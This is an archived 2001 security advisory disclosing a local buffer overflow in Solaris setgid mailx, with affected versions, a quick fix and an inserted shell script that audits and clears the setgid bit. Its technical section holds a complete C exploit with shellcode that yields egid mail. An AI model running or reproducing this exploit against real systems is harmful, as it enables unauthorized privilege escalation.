Solaris mailx Vulnerability

From: Pablo Sor (psorat_private)
Date: Wed May 02 2001 - 09:30:45 PDT

    Vulnerability in Solaris mailx(1)
    
    Date Published: April 11, 2001
    
    Advisory ID: N/A
    
    Bugtraq ID: N/A
    
    CVE CAN: None currently assigned.
    
    Title: Solaris mailx(1) Buffer Overflow Vulnerability
    
    Class: Boundary Error Condition
    
    Remotely Exploitable: No
    
    Locally Exploitable: Yes
    
    Vulnerability Description:
    
    The mailx program is installed setgid mail by default on Solaris. A buffer
    overrun exists in the handling of the -F option: by passing an overly long
    argument containing machine executable code, it is possible to execute
    arbitrary commands with the effective group id of mail.
    
    Vulnerable Packages/Systems:
    
    Solaris 8     SPARC
    Solaris 8     x86
    Solaris 7     SPARC
    Solaris 7     x86
    Solaris 2.6   SPARC
    Solaris 2.6   x86
    Solaris 2.5.1 SPARC
    Solaris 2.5.1 x86
    Solaris 2.5   SPARC
    Solaris 2.5   x86
    
    Quick Fix:
    
    Clear the setgid (sgid) bit on the /usr/bin/mailx program.
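
    Added example (not part of the advisory): a POSIX sh helper that audits a path for the setgid bit and applies the quick fix above. It assumes only chmod(1) and find(1), and uses /usr/bin/mailx from the advisory as the default path.

```sh
#!/bin/sh
# Audit/remediation helper for the mailx(1) quick fix (added example, not
# part of the original advisory): report whether a binary carries the
# setgid bit and, when asked, clear it with chmod g-s.

# has_setgid PATH -> exit 0 if PATH has the setgid bit, 1 otherwise.
# `find -perm -2000` is POSIX and behaves the same on Solaris and Linux,
# unlike stat(1), whose options differ between platforms.
has_setgid() {
    [ -e "$1" ] || return 1
    [ -n "$(find "$1" -prune -perm -2000 -print 2>/dev/null)" ]
}

# clear_setgid PATH -> apply the advisory's quick fix and print the
# resulting mode line; returns 1 if the bit could not be cleared.
clear_setgid() {
    chmod g-s "$1" || return 1
    if has_setgid "$1"; then
        echo "FAIL: $1 still setgid" >&2
        return 1
    fi
    ls -ld "$1"
}

# audit_setgid PATH... -> prints "setgid: PATH" or "ok: PATH" per path.
# Returns 1 if any path is still setgid, so it can gate a cron job.
audit_setgid() {
    rc=0
    for p in "$@"; do
        if has_setgid "$p"; then
            echo "setgid: $p"
            rc=1
        else
            echo "ok: $p"
        fi
    done
    return $rc
}

# Usage (run as root on an affected host), defaulting to the advisory's path:
#   audit_setgid /usr/bin/mailx || clear_setgid /usr/bin/mailx
if [ "$#" -gt 0 ]; then
    audit_setgid "$@" || echo "run clear_setgid on each setgid entry" >&2
fi
```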
    
    Solution/Vendor:
    
    Sun Microsystems was notified on April 18, 2001. Patches are expected shortly.
    
    Vendor notified on: April 18, 2001
    
    Credits:
    
    This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.
    
    This advisory was drafted with the help of the SecurityFocus.com Vulnerability
    Help Team. For more information or assistance drafting advisories please mail
    vulnhelpat_private
    
    Technical Description - Exploit/Concept Code:
    
    #include <fcntl.h>
    #include <stdlib.h>     /* malloc, putenv */
    #include <string.h>     /* memset, memcpy, strlen */
    #include <unistd.h>     /* symlink, execl */
    
    /*
    
       /usr/bin/mailx overflow proof of concept.
    
    
       Pablo Sor, Buenos Aires, Argentina 04/2001
       psorat_private, psorat_private
    
       works against x86 solaris 8
    
       default offset should work.
    
       usage:
    
       bash$ id
       uid=100(laika) gid=1(other)
    
       bash$ ./mailx-exp
       Subject: tomy
       .
       EOT
    
       [wait...]
    
       $ id
       uid=100(laika) gid=1(other) egid=6(mail)
    
    
    */
    
    /* returns the current stack pointer (32-bit x86, gcc inline asm) */
    long get_esp() { __asm__("movl %esp,%eax"); }
    
    int main(int ac, char **av)
    {
    
    char shell[]=
    "\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"
    "\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"
    "\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"
    "\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"
    "\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"
    "\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"
    "\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"
    "\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"
    "\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"
    "\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78";
    
     unsigned long magic = get_esp() + 2075;  /* default offset */
     unsigned char buf[1150];
     char *envi;
    
     /* payload is handed to mailx through the environment variable SOR */
     envi = (char *)malloc(300*sizeof(char));
     memset(envi,0x90,300);
     memcpy(envi+280-strlen(shell),shell,strlen(shell));
     memcpy(envi,"SOR=",4);
     envi[299]=0;
     putenv(envi);
    
     symlink("/bin/ksh","/tmp/xx");
     /* oversized -F argument with the guessed address written into it */
     memset(buf,0x41,1150);
     memcpy(buf+1116,&magic,4);
     buf[1149]=0;
     execl("/usr/bin/mailx","mailx","-F",buf,NULL);
     return 1;  /* only reached if exec fails */
    }
    
    
    --
    Pablo Sor
    psorat_private, psorat_private
    



    This archive was generated by hypermail 2b30 : Wed May 02 2001 - 19:32:40 PDT